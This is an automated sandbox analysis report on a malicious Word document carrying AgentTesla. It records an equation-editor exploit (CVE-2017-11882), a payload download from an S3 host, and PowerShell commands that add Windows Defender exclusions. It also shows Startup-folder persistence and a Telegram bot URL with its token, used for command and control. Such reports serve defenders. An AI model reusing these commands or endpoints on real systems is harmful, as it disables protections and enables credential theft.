Loading ...

Play interactive tourEdit tour

Analysis Report Allignright_companyprofile.doc

Overview

General Information

Sample Name:Allignright_companyprofile.doc
Analysis ID:404236
MD5:5a0c6dd1f7bbc5272f2ced270e2d4d8a
SHA1:9f553e08793745277db8a0d3aa82a63b7526a28b
SHA256:fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
Tags:AgentTesladoc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Drops PE files to the startup folder
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Non Interactive PowerShell
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1796 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1296 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • CTF loader_es.exe (PID: 2336 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • powershell.exe (PID: 2536 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2772 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2852 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • Bw6d8Paf6bOV36xS4N6.exe (PID: 2368 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
        • powershell.exe (PID: 1552 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 660 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2812 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2252 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3064 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • CTF loader_es.exe (PID: 2444 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
      • CTF loader_es.exe (PID: 2788 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • Bw6d8Paf6bOV36xS4N6.exe (PID: 1192 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
    • powershell.exe (PID: 2920 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2300 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2760 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 1900 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • svchost.exe (PID: 2916 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

Exploits:

barindex
Sigma detected: EQNEDT32.EXE connecting to internetShow sources
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 52.218.240.113, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1296, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXEShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1296, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe

System Summary:

barindex
Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CTF loader_es.exe, NewProcessName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1296, ProcessCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ProcessId: 2336
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, ProcessId: 2536

Malware Analysis System Evasion:

barindex
Sigma detected: Powershell adding suspicious path to exclusion listShow sources
Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2336, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, ProcessId: 2300

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeVirustotal: Detection: 41%Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeVirustotal: Detection: 41%Perma Link
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeVirustotal: Detection: 41%Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeReversingLabs: Detection: 44%
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted fileShow sources
Source: Allignright_companyprofile.docReversingLabs: Detection: 14%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeJoe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeJoe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2536.6001966ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000005.00000002.2117946573.00000000003F3000.00000004.00000020.sdmp
Source: Binary string: G??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2772.6004244ion.pdb source: powershell.exe, 00000009.00000002.2119685464.000000000037A000.00000004.00000020.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2135376246.000000000579D000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2124286114.0000000002AD0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2505
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile opened: C:\Users\user\
Source: global trafficDNS query: name: miolouno.s3-us-west-2.amazonaws.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 52.218.240.113:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 52.218.240.113:80

Networking:

barindex
Uses the Telegram API (likely for C&C communication)Show sources
Source: unknownDNS query: name: api.telegram.org
Source: global trafficHTTP traffic detected: GET /mad.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: miolouno.s3-us-west-2.amazonaws.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmpJump to behavior
Source: global trafficHTTP traffic detected: GET /mad.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: miolouno.s3-us-west-2.amazonaws.comConnection: Keep-Alive
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: miolouno.s3-us-west-2.amazonaws.com
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: CTF loader_es.exe, 00000004.00000003.2124857296.0000000002B2B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: CTF loader_es.exe, 00000004.00000002.2201019666.00000000052B0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2120486810.0000000002210000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: CTF loader_es.exe, 00000004.00000002.2203421467.0000000005FD7000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2125462259.0000000002DB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: CTF loader_es.exe, 00000004.00000002.2202703631.0000000005DF0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2123743108.0000000002BD0000.00000002.00000001.sdmp, powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000003.2110241441.0000000000407000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2110770668.00000000005AA000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000007.00000002.2124544542.0000000002B40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/
Source: CTF loader_es.exe, 00000004.00000002.2186884993.0000000003C1A000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

System Summary:

barindex
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CTF loader_es.exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0037B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_01F1B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0209B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_01D3B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0211B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_01B8B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_003CB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_01E8B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_0200B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_025DB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_006DB2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_0067B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043B2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0043B2CC NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEB2EE NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_01DEB2CC NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeFile created: C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044Jump to behavior
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_002E2050
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_001D0490
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_001D0C80
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeCode function: 4_2_001D0457
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_02861C60
